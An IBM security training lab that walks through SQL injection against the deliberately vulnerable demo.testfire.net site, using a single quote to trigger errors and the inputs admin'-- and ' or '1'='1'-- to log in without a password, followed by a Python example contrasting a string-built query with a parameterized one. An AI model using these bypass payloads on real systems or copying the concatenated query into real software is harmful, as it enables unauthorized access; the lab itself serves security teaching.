IBM software 


Lab 3: Login without Credentials


In the training we saw how SQL injection can cause an application to use unvalidated user input either to
circumvent the application's business logic or to interact with the database directly.


In this lab we are going to check whether the demo.testfire.net web application is susceptible to SQL
injection and whether we can exploit it to log into the application without a password.


In this lab we will see how to log in to demo.testfire.net without a password.


In this lab you will play the role of a malicious user.


Lab Overview 


3.1 Find the login page
   a. Can you create an account?
   b. Can you determine a valid username?

3.2 Can you cause an error?
   a. What information do you learn when you cause an error?
   b. What database is this using?
   c. What are techniques that you might use?
   d. What characters terminate a SQL statement?

3.3 Exploit
3.1 Find the Login Page


__1. Open a Firefox browser by selecting the icon on the desktop 










__2. Enter the link http://demo.testfire.net/bank/login.aspx 


3.2 Can you cause an error? 


__1. Enter no username or password and select Login button 


We learn that a username is required.


Page 2 Lab 3 — Login without Credentials 
© 2007 IBM Corporation 




__3. Enter donald in the username field, leave the password field blank and select Login button 






__4. Review return 





We learn the site uses client-side JavaScript validation on each of the fields.
You can right-click on the page and select VIEW SOURCE to see the JavaScript used
to validate that the username and password fields cannot be blank.


__5. Enter donald in the username field and a single quote (') in the password field and select Login button


__6. Review information that application returns


[Error page: "An Error Has Occurred", with an Error Message reading Line 1: Incorrect syntax near ... and
Unclosed quotation mark before the character string ..., followed by a System.Data.OleDb stack trace]





Instead of a generic message the application returns details
about the SQL query, with enough information that we can make
some assumptions about how to interact with the database.

The fact that the single quote entered returns the error Line 1:
Incorrect syntax near '"'. tells us that we have broken the syntax
of the query. If we take a look at the actual query below, we can
see that the user input caused a syntax error for the value of the
password parameter.


We can now use this knowledge to circumvent the business logic
for the condition in the query.


Query:

SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'"

Resulting query with the above input:

SQLQuery = "SELECT Username FROM Users WHERE Username = 'donald' AND Password = '''"

We can now see that the single quote entered for the password
broke the syntax: the quote closes the Password literal early and
leaves a stray quote that the database cannot parse.


__7. Select browser Back button to return to login page


3.3 Exploit


__1. Enter dan'-- in the username field and anything in the password field, then select Login button






__2. Review information that application returns 





Result: Login Failed - Invalid Username
The application is telling us our username is incorrect. 


The -- (two dashes) is used to indicate a comment and acts to
terminate the SQL statement, so in our case this means a
password will not be needed to log in to the application. However,
we need to input a password into the form so that the JavaScript
does not complain that it is missing; it does not need to be the
correct password, as the SQL query will not use it.


In effect our query has become:

SQLQuery = "SELECT Username FROM Users WHERE Username = 'dan'-- ..."

Everything after the two dashes is treated as a comment.
__3. Enter admin'-- in the username field and any password, then select Login button





__4. Review Results 





Result: Hello, Admin User. Welcome to Altoro Mutual Online.
We learn that a valid SQL statement = login:

SELECT Username FROM Users WHERE Username = 'smith' AND Password = 'demo1234'

SELECT Username FROM Users WHERE Username = 'admin' --' AND Password = 'does not matter'

If we did not know a username we could have logged in as the
first user in the table using the following input: ' or '1'='1'--

SELECT Username FROM Users WHERE Username = '' or '1'='1'--' AND Password = 'does not matter'

The input causes a true condition and hence the username value
does not matter (and the password part of the condition is
commented out), and we will log in as the first user in the
database.
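The string-built query from section 3.2 beside a parameterized version, as an added example that is not part of the original lab material. It loads a small constructed Users table (made-up accounts and passwords) into an in-memory SQLite database standing in for the application's database, then runs a legitimate login and the two inputs from section 3.3 (admin'-- and ' or '1'='1'--) through both forms to show why bound parameters stop the input from changing the meaning of the query.

```python
import sqlite3

# Constructed sample data: a small Users table standing in for the demo
# application's back-end database (accounts and passwords are made up).
SAMPLE_USERS = [("admin", "S3cret!"), ("jsmith", "demo1234"), ("dan", "p@ssw0rd")]

def make_db():
    """Create an in-memory SQLite database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable form mirroring the lab's string-built query: the input becomes
    part of the SQL text, so a quote closes the literal and -- comments out the
    rest of the WHERE clause, including the password check."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Hardened form: the SQL text is fixed and the input travels as bound
    parameters, so admin'-- is compared against the Username column as a
    literal string and never reaches the SQL parser."""
    sql = "SELECT Username FROM Users WHERE Username = ? AND Password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def compare(username, password):
    """Return (vulnerable result, hardened result) for one set of credentials."""
    conn = make_db()
    try:
        return (login_concatenated(conn, username, password),
                login_parameterized(conn, username, password))
    finally:
        conn.close()

if __name__ == "__main__":
    for creds in [("jsmith", "demo1234"),                  # legitimate login
                  ("admin'--", "does not matter"),         # the lab's step 3 input
                  ("' or '1'='1'--", "does not matter")]:  # the lab's first-user input
        print(creds, "->", compare(*creds))
```

The vulnerable form returns "admin" for both injected inputs while the parameterized form returns None, since the whole string is looked up as a username that does not exist.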
__5. Select Back button

__6. Close browser